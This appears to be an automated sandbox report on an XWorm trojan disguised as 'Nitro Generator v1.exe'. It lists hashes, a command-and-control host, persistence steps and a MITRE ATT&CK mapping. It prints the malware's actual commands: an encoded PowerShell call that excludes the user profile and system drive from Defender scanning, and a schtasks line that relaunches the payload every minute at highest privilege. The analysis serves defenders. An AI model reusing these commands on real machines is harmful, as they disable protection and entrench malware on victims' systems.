Analysis
-
max time kernel
145s -
max time network
148s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
21-06-2024 23:03
Static task
static1
Behavioral task
behavioral1
Sample
Nitro Generator v1.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
Nitro Generator v1.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Nitro Generator v1.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
Nitro Generator v1.exe
Resource
win11-20240508-en
General
-
Target
Nitro Generator v1.exe
-
Size
225KB
-
MD5
a2da88430b3dd46d547cd75126ecee69
-
SHA1
c41229461c4b6ddc695c8a01940e76a0f0b930b7
-
SHA256
c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12
-
SHA512
c3dcfa26d3c2a10f5ac58cd22f2c5bf5fbb986c11a43a547e0ea1f4ac016819de46bfadab6d111e83c2c9f572285a7f3ea4e275944ef7c16bf98426283fac859
-
SSDEEP
3072:LVAzYZD5kDzAgXKnj8meFDm8Zk5WFEw2zlXPcARAK4Mtx1Nnva/Vk5uAOcU3aQg7:LVBZ+DsfnwmlMkQEaARV4MT6dY9Mg59
Malware Config
Extracted
xworm
runderscore00-25851.portmap.host:25851
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\Nitro Generator.exe family_xworm behavioral2/memory/5024-54-0x0000000000F90000-0x0000000000FAA000-memory.dmp family_xworm -
Drops startup file 2 IoCs
Processes:
Nitro Generator.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Nitro Generator.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Nitro Generator.exe -
Executes dropped EXE 4 IoCs
Processes:
NitroGen.exeNitro Generator.exesvchostsvchostpid process 2920 NitroGen.exe 5024 Nitro Generator.exe 2512 svchost 1016 svchost -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Nitro Generator.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" Nitro Generator.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in Windows directory 1 IoCs
Processes:
Nitro Generator v1.exedescription ioc process File created C:\Windows\Nitro Generator.exe Nitro Generator v1.exe -
Processes:
powershell.exepowershell.exepid process 68 powershell.exe 2716 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.exepowershell.exeNitro Generator.exepid process 68 powershell.exe 68 powershell.exe 68 powershell.exe 2716 powershell.exe 2716 powershell.exe 2716 powershell.exe 5024 Nitro Generator.exe -
Suspicious use of AdjustPrivilegeToken 27 IoCs
Processes:
powershell.exeNitro Generator.exepowershell.exesvchostsvchostdescription pid process Token: SeDebugPrivilege 68 powershell.exe Token: SeDebugPrivilege 5024 Nitro Generator.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeIncreaseQuotaPrivilege 2716 powershell.exe Token: SeSecurityPrivilege 2716 powershell.exe Token: SeTakeOwnershipPrivilege 2716 powershell.exe Token: SeLoadDriverPrivilege 2716 powershell.exe Token: SeSystemProfilePrivilege 2716 powershell.exe Token: SeSystemtimePrivilege 2716 powershell.exe Token: SeProfSingleProcessPrivilege 2716 powershell.exe Token: SeIncBasePriorityPrivilege 2716 powershell.exe Token: SeCreatePagefilePrivilege 2716 powershell.exe Token: SeBackupPrivilege 2716 powershell.exe Token: SeRestorePrivilege 2716 powershell.exe Token: SeShutdownPrivilege 2716 powershell.exe Token: SeDebugPrivilege 2716 powershell.exe Token: SeSystemEnvironmentPrivilege 2716 powershell.exe Token: SeRemoteShutdownPrivilege 2716 powershell.exe Token: SeUndockPrivilege 2716 powershell.exe Token: SeManageVolumePrivilege 2716 powershell.exe Token: 33 2716 powershell.exe Token: 34 2716 powershell.exe Token: 35 2716 powershell.exe Token: 36 2716 powershell.exe Token: SeDebugPrivilege 5024 Nitro Generator.exe Token: SeDebugPrivilege 2512 svchost Token: SeDebugPrivilege 1016 svchost -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Nitro Generator.exepid process 5024 Nitro Generator.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
Nitro Generator v1.exeNitro Generator.exedescription pid process target process PID 2280 wrote to memory of 68 2280 Nitro Generator v1.exe powershell.exe PID 2280 wrote to memory of 68 2280 Nitro Generator v1.exe powershell.exe PID 2280 wrote to memory of 2716 2280 Nitro Generator v1.exe powershell.exe PID 2280 wrote to memory of 2716 2280 Nitro Generator v1.exe powershell.exe PID 2280 wrote to memory of 2920 2280 Nitro Generator v1.exe NitroGen.exe PID 2280 wrote to memory of 2920 2280 Nitro Generator v1.exe NitroGen.exe PID 2280 wrote to memory of 5024 2280 Nitro Generator v1.exe Nitro Generator.exe PID 2280 wrote to memory of 5024 2280 Nitro Generator v1.exe Nitro Generator.exe PID 5024 wrote to memory of 2656 5024 Nitro Generator.exe schtasks.exe PID 5024 wrote to memory of 2656 5024 Nitro Generator.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:68
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"2⤵
- Executes dropped EXE
PID:2920
-
-
C:\Windows\Nitro Generator.exe"C:\Windows\Nitro Generator.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5024 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2656
-
-
-
C:\ProgramData\svchostC:\ProgramData\svchost1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2512
-
C:\ProgramData\svchostC:\ProgramData\svchost1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1016
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize
654B
MD516c5fce5f7230eea11598ec11ed42862
SHA175392d4824706090f5e8907eee1059349c927600
SHA25687ba77c13905298acbac72be90949c4fe0755b6eff9777615aa37f252515f151
SHA512153edd6da59beea6cc411ed7383c32916425d6ebb65f04c65aab7c1d6b25443d143aa8449aa92149de0ad8a975f6ecaa60f9f7574536eec6b38fe5fd3a6c6adc
-
Filesize
1KB
MD5d0768b8870ea9d68a7334004b95bbba2
SHA196828a3b50436db8be2cc84464941bda69cc9be8
SHA2563f2b4482354da125b4b9e8770c092839a7617e42be0baf8abd1776b3a5188a86
SHA512be1d8d7f98b11cb35b6a6ded20751a5be0a79fe9a8f1301f1db28fb08f2937f3dead07a11edd23dc55897939d4ad68b0903c7a5574c334b0294a7d11570df4c4
-
Filesize
139KB
MD516c70bc93e70148d8e32877fb69c5163
SHA19997631ad75d02297a4c7a06c37db115a0a1c0ec
SHA256b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d
SHA51202242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
77KB
MD58bbf53c41f2625a3c4e608ad13cb2c55
SHA13335287d42f6e674eb1d4465949e02d262bb8391
SHA256ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299
SHA5129c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec